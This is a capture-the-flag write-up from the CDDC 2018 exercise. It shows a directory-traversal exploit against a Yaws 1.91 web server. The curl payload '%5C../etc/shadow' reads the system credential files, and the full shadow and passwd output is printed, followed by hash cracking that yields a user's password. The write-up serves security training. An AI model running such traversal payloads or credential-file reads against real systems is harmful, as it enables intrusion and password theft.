CDDC 2018: They Are Coming On Too Fast

Category: Kamikaze Points: 126s Description:

  1. From your position on target 10.50.0.199, exploit the target 10.50.199.11 and gain access to the file ' /etc/passwd ' .
  2. Inside the file, identify the username starting with the case-sensitive letter ' h ' .
  3. Enter the correct username into the response field below.
  4. Submit the Kamikaze Challenge by clicking on the Submit button.

Write-Up

Attempting to access the webserver on 10.50.199.11, we get

# curl -k 'https://10.50.199.11/' -L
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
 <head>
  <title>Index of /</title>
  <style type="text/css">
    img { border: 0; padding: 0 2px; vertical-align: text-bottom; }
    td  { font-family: monospace; padding: 2px 3px; text-align:left;
          vertical-align: bottom; white-space: pre; }
    td:first-child { text-align: left; padding: 2px 10px 2px 3px; }
    table { border: 0; }
  </style>
</head> 
<body>
<h1>Index of /</h1>
<table>
  <tr>
    <td><img src="/icons/blank.gif" alt="&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"/><a href="?N=r">Name</a></td>
    <td><a href="?M=r">Last Modified</a></td>
    <td><a href="?S=r">Size</a></td>
    <td><a href="?D=r">Description</a></td>
  </tr>
  <tr><th colspan="4"><hr/></th></tr>
  <tr>
    <td><img src="/icons/back.gif" alt="[DIR]"/><a href="..">Parent Directory</a></td>
    <td></td>
    <td>-</td>
    <td></td>
  </tr>
  <tr>
    <td><img src="/icons/compressed.gif" alt="[DIR]"/><a href="all.zip">all.zip</a></td>
    <td></td>
    <td>-</td>
    <td>Build a zip archive of current directory</td>
  </tr>
  <tr>
    <td><img src="/icons/dir.gif" alt="[DIR]"/><a href=".ICE-unix" title=".ICE-unix">.ICE-unix</a></td>
    <td>01-Jun-2018 08:01</td>
    <td>4k</td>
    <td></td>
  </tr>
  <tr>
    <td><img src="/icons/dir.gif" alt="[DIR]"/><a href=".X11-unix" title=".X11-unix">.X11-unix</a></td>
    <td>01-Jun-2018 08:01</td>
    <td>4k</td>
    <td></td>
  </tr>
  <tr><th colspan="4"><hr/></th></tr>
</table>
<address> Yaws 1.91 Server at cddc-ot-svr1 </address></body>
</html>

Knowing that, a little of Google magic, you find Yaws 1.91 and at the first result, we find a remote file disclosure exploit. Attempting to add %5C to our payload, we can retrieve the passwords.

[root@fw2018 ~]# curl -k 'https://10.50.199.11/%5C../etc/shadow' -L
root:$6$tBedrW0t$WxW/LC8v5/L5b2UhZVtWAg4Nc9rJVIk8LZng38V77T5Bj1BlpdrzlfZqL5b1AJAwvb4uvbuEhoNgga44gWYbY/:17575:0:99999:7:::
daemon:*:17553:0:99999:7:::
bin:*:17553:0:99999:7:::
sys:*:17553:0:99999:7:::
sync:*:17553:0:99999:7:::
games:*:17553:0:99999:7:::
man:*:17553:0:99999:7:::
lp:*:17553:0:99999:7:::
mail:*:17553:0:99999:7:::
news:*:17553:0:99999:7:::
uucp:*:17553:0:99999:7:::
proxy:*:17553:0:99999:7:::
www-data:*:17553:0:99999:7:::
backup:*:17553:0:99999:7:::
list:*:17553:0:99999:7:::
irc:*:17553:0:99999:7:::
gnats:*:17553:0:99999:7:::
nobody:*:17553:0:99999:7:::
libuuid:!:17553:0:99999:7:::
syslog:*:17553:0:99999:7:::
messagebus:*:17553:0:99999:7:::
landscape:*:17553:0:99999:7:::
sshd:*:17553:0:99999:7:::
pollinate:*:17553:0:99999:7:::
ntp:*:17553:0:99999:7:::
hero:$6$Pp5IF6vM$PBUVJNHiMRcJcI3J/ZKTAcIzl2O0QcrAFhnUy1beS856o0mml4MCsfPCXJWsEyaL4eqX7GNiQZUcctjNbZ4NT0:17575:0:99999:7:::
ubuntu:!:17665:0:99999:7:::
osboxes:*:17665:0:99999:7:::
moveforwarduser:$6$mfPzC55B$6VoacTQsoLMnZ3HHQPX7jR2Pcdowu9VWSttZ1xkcUTw7en5Bnr07u0ezRLtD4q6yVQb80lnAAMBbBbGuotPTk.:17665:0:99999:7:::
[root@fw2018 ~]# curl -k 'https://10.50.199.11/%5C../etc/passwd' -L
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
landscape:x:103:109::/var/lib/landscape:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
ntp:x:106:111::/home/ntp:/bin/false
hero:x:1000:1000:,,,:/home/hero:/bin/bash
ubuntu:x:1001:1002:Ubuntu:/home/ubuntu:/bin/bash
osboxes:x:1002:1003::/home/osboxes:/bin/bash
moveforwarduser:x:1003:1004:,,,:/home/moveforwarduser:/bin/bash

A little filtering and unshadowing later, we get three nice password hashes,

root:$6$tBedrW0t$WxW/LC8v5/L5b2UhZVtWAg4Nc9rJVIk8LZng38V77T5Bj1BlpdrzlfZqL5b1AJAwvb4uvbuEhoNgga44gWYbY/:0:0:root:/root:/bin/bash
hero:$6$Pp5IF6vM$PBUVJNHiMRcJcI3J/ZKTAcIzl2O0QcrAFhnUy1beS856o0mml4MCsfPCXJWsEyaL4eqX7GNiQZUcctjNbZ4NT0:1000:1000:,,,:/home/hero:/bin/bash
moveforwarduser:$6$mfPzC55B$6VoacTQsoLMnZ3HHQPX7jR2Pcdowu9VWSttZ1xkcUTw7en5Bnr07u0ezRLtD4q6yVQb80lnAAMBbBbGuotPTk.:1003:1004:,,,:/home/moveforwarduser:/bin/bash

Attempting to crack each one gives,

root:
hero:batman
moveforwarduser:

As the question asks specifically for the username starting with the case-sensitive letter ' h ', we have our flag already.

Therefore, the flag is hero.

results matching ""

    No results matching ""